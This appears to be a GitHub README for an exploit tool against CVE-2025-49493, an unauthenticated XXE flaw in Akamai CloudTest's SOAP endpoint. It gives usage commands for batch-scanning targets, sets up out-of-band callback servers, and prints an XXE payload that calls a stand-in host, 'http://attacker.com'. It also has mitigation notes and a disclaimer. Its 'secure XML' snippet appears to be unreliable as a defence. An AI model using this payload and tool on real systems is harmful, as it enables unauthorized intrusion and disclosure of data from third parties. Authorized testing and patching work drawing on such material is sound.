# Akamai CloudTest XXE Exploit (CVE-2025-49493)

## Overview

This is a Python-based exploit for **CVE-2025-49493**, which affects Akamai CloudTest versions before 60 2025.06.02 (12988). The vulnerability allows for XML External Entity (XXE) injection through the SOAP service endpoint.

## Vulnerability Details

- **CVE ID**: CVE-2025-49493
- **Vulnerability Type**: XML External Entity (XXE) Injection
- **Severity**: Critical (CVSS 9.1)
- **Affected Software**: Akamai CloudTest
- **Affected Versions**: Before 60 2025.06.02 (12988)
- **Attack Vector**: Network
- **Authentication Required**: No

## Technical Details

The vulnerability exists in the `/concerto/services/RepositoryService` SOAP endpoint where XML input is processed without proper sanitization of external entities. An attacker can craft malicious XML payloads to trigger XXE attacks, potentially leading to:

- Information disclosure
- SSRF (Server-Side Request Forgery)
- Denial of Service
- Potential RCE in certain configurations

## Features

- **Target Discovery**: Automatically identifies Akamai CloudTest instances
- **Vulnerability Detection**: Checks for vulnerable endpoints and indicators
- **XXE Exploitation**: Sends crafted SOAP requests with XXE payloads
- **Multiple Targets**: Supports batch processing from target files
- **Detailed Logging**: Comprehensive colored logging with timestamps
- **Error Handling**: Robust error handling for network issues

## Installation

### Prerequisites

- Python 3.6 or higher
- pip package manager

### Dependencies

Install required packages:

```bash
pip install -r requirements.txt
```

Or install manually:

```bash
pip install requests urllib3 colored pyfiglet
```

## Usage

### Basic Usage

```bash
python main.py targets.txt xxe.attacker.com
```

### Advanced Usage

```bash
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com
```

### Command Line Options

```
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)
```

## Target File Format

Create a `targets.txt` file with one target per line:

```
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org
```

## Setting up XXE Server

### Option 1: Using Burp Collaborator

1. Open Burp Suite Professional
2. Go to Burp > Burp Collaborator client
3. Click "Copy to clipboard" to get your collaborator URL
4. Use this URL as the xxe_server parameter

### Option 2: Using Interactsh

1. Install interactsh: `go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest`
2. Run: `interactsh-client`
3. Use the provided URL as the xxe_server parameter

### Option 3: Custom HTTP Server

Set up a simple HTTP server to capture requests:

```python
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()
```

## Exploit Flow

1. **Target Validation**: Validates URL format and accessibility
2. **Vulnerability Detection**: 
   - Checks for CloudTest indicators in response
   - Verifies SOAP service endpoint exists
3. **XXE Payload Generation**: Creates malicious SOAP envelope with XXE
4. **Exploitation**: Sends crafted request to vulnerable endpoint
5. **Result Analysis**: Analyzes response for success indicators

## XXE Payload Structure

The exploit uses the following XXE payload structure:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>
```

## Mitigation

### For Administrators

1. **Immediate Actions**:
   - Update Akamai CloudTest to version 60 2025.06.02 or later
   - Monitor logs for suspicious XML processing activities
   - Implement network segmentation to limit exposure

2. **Long-term Solutions**:
   - Disable XML external entity processing in XML parsers
   - Implement input validation and sanitization
   - Use allow-lists for XML processing
   - Regular security assessments

### For Developers

1. **Secure XML Processing**:
   ```python
   # Disable external entities in XML parsers
   import xml.etree.ElementTree as ET
   parser = ET.XMLParser()
   parser.parser.DefaultHandler = lambda data: None
   parser.parser.ExternalEntityRefHandler = lambda *args: False
   ```

2. **Input Validation**:
   - Validate all XML input against strict schemas
   - Sanitize user-controlled data before XML processing
   - Implement proper error handling

## References

- [Original Research by xbow](https://xbow.com/blog/xbow-akamai-cloudtest-xxe/)
- [Akamai CloudTest Changelog](https://techdocs.akamai.com/cloudtest/changelog/june-2-2025-enhancements-and-bug-fixes)
- [CVE-2025-49493 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-49493)
- [OWASP XXE Prevention](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)

## Legal Disclaimer

This tool is provided for educational and authorized testing purposes only. Users are responsible for ensuring they have proper authorization before testing any systems. The authors are not responsible for any misuse or damage caused by this tool.

## Contributing

1. Fork the repository
2. Create a feature branch
3. Make your changes
4. Add tests if applicable
5. Submit a pull request

## License

This project is licensed under the MIT License - see the LICENSE file for details.

## Authors

- **Original Research**: xbow, 3th1c_yuk1
- **Exploit Development**: Security Research Team
- **CVE Assignment**: CVE-2025-49493

## Changelog

### v1.0.0
- Initial release
- Basic XXE exploitation functionality
- Target file support
- Comprehensive logging
- Error handling improvements